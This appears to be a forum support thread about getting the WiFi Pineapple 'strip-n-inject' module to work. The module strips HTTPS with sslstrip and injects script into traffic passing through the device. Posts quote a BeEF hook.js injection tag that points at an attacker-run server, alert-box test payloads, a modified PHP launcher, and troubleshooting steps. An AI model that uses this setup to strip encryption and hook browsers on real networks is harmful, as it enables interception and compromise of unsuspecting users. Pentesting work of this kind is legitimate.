Jump to content

[Support] strip-n-inject


leg3nd
 Share

Recommended Posts

Hi @leg3nd, i tried your infusion many time but never success inject hook.js in traffic thought my Pineapple. I config my Pineapple work as "client mode", my inject code is "<meta http-equiv="cache-control" content="no-cache" /><script src=\"http://172.16.42.3:3000/hook.js\" type=\"text/javascript\"></script>". My laptop is Kali Linux (172.16.42.3) running beef server. I ssh to pineapple (172.16.42.1) and run start.sh from "/pineapple/components/infusions/strip-n-inject/includes/".

Everything seen ok, but when i test suff web througt pineapple, the html page not be injected, i check the source code of html respone and it not have hook.js.

I don't know what's wrong? You can help me? Thanks alot!

Same results when you try it from the infusion UI?

An easy way to test if the strip-n-inject infusion is working is to inject a simple popup box:

<script>alert("It worked!!");</script>

Make sure you're not browsing on HTTPS directly because you cannot inject into encrypted HTTP traffic.

Link to comment
Share on other sites

  • 1 month later...
Hello, I'm trying to make strip-n-inject work. When I click start it doesn't start... To make it start I need to run sslstrip and then strip-n-inject will run automatly but even there it won't inject any code.


I already try on many websites and check the source code and nothing was injected. :wacko:


I made it work running the sslstrip.py manually but I just made it work 2-3 times then idk how to make it work again... I just got the pineapple 2 days ago, but I already try to reboot and Factory Reset many times.


I hope someone have the answer, thanks! :grin:

Link to comment
Share on other sites

Hello guys, I'm having big trouble with Strip-n-inject... If I install the infusion on my internal storage then the Infusion won't run, and If I install it on the SD then the infusion will run but it won't let me get into my pineapple GUI. But if I kill this process from SSH:

 9261 root     14720 S    python sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.

or (from top)

 9261     1 root     S    14756  24%   0% python sslstrip.py -s -k -f -w /sd/tm

Then this process will come up:

 9545  9542 root     S N  14728  24%   3% python /usr/bin/sslstrip 0.9 by Moxie

Strip-n-inject say it's running but it won't work at all.

If someone can help me would be awesome, thx guys.

UPDATE:

The Infusion works well it inject code If I install it in to the SD, but I can't access my Pineapple via UI (From the browser) It got frizzed and It won't work until I kill the process that I quote before.

UPDATE 2:

Now I got it working and I found the error, I guess the infusion doesn't run the script in background. Cuz if I run it manually (in background) it work and doesn't freeze the UI:

./start.sh &

I hope the dev can fix this, awesome job btw keep it up!

UPDATE 3:

I just edit the this file "/sd/infusions/strip-n-inject/includes/actions.php", here it's my edit if someone need it, It works like a charm now!

<?php                                                                                                                                                                                
                                                                                                                                                                                     
require("/pineapple/components/infusions/strip-n-inject/handler.php");                                                                                                               
                                                                                                                                                                                     
global $directory, $rel_dir;                                                                                                                                                         
                                                                                                                                                                                     
require($directory."includes/vars.php");                                                                                                                                             
                                                                                                                                                                                     
if (isset($_GET['codeinject']))                                                                                                                                                      
{                                                                                                                                                                                    
                                                                                                                                                                                     
  if (isset($_GET['start']))                                                                                                                                                         
  {                                                                                                                                                                                  
                                                                                                                                                                                     
    shell_exec("/sd/infusions/strip-n-inject/includes/start.sh > /dev/null &");                                                                                                      
  }                                                                                                                                                                                  
                                                                                                                                                                                     
  if (isset($_GET['stop']))                                                                                                                                                          
  {                                                                                                                                                                                  
    shell_exec("/sd/infusions/strip-n-inject/includes/stop.sh");                                                                                                                     
                                                                                                                                                                                     
  }                                                                                                                                                                                  
                                                                                                                                                                                     
  if (isset($_GET['install']))                                                                                                                                                       
  {                                                                                                                                                                                  
     exec("chmod +x ".$directory."includes/install.sh");                                                                                                                             
     exec("bash ".$directory."includes/install.sh | at now");                                                                                                                        
  }                                                                                                                                                                                  
                                                                                                                                                                                     
} 
Edited by GnomeProgramming
Link to comment
Share on other sites

Hi there, version 1.4.0 may have broken compatibility with this infusion. It's not injecting anymore for me. I'm trying with the simple pop-up:

<script>alert("It worked!!");</script>

Edit: sorry for the late edit, I was able to make it work by launching manually sslstrip instead of using the tile.

Edited by wolfdale
Link to comment
Share on other sites

  • 1 month later...

Hi bros, i have problem when install Strip-n-inject fusion after i upgrade my Mark V to 2.0.2. I don't know the host "cloud.wifipineapple.com" is down temporary or have something wrong with this firmware.

This is my log when i try install this fusion:

root@Pineapple:/sd/infusions/strip-n-inject/includes# ./install.sh
No packages removed.
Downloading http://cloud.wifipineapple.com/mk5/packages/Packages.gz.
Updated list of available packages in /var/opkg-lists/pineapple_packages.
Installing twisted-web (2.5.0-1) to root...
Downloading http://cloud.wifipineapple.com/mk5/packages/twisted-web_2.5.0-1_ar71xx.ipk.
wget: error getting response: Connection reset by peer
Collected errors:
 * opkg_download: Failed to download http://cloud.wifipineapple.com/mk5/packages/twisted-web_2.5.0-1_ar71xx.ipk, wget returned 1.
 * opkg_install_pkg: Failed to download twisted-web. Perhaps you need to run 'opkg update'?
 * opkg_install_cmd: Cannot install package twisted-web.
Link to comment
Share on other sites

  • 4 months later...

I am interested in injecting a BeeF hook into browsers which are connected to my AP-- my own of course. From what I've read this is possible with Strip-N-Inejct; however, I have had some issues getting it to run. I've flashed, manually, to the most current update-- having issues with the WFIP seeing my SD. A little research suggests that I might have to reformat it. I went in and edited the inject.txt via CLI to <script>window.alert("You have new e-mail messages!");</script> as someone had suggested in order to test and see if it is running, but I am having no luck. When I try and run S-n-I from the GUI it doesn't 'start'. The only way I can start it is from the CLI via ./start.sh. If Strip-N-Inject wont work for what I am trying to do might there be another solution?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...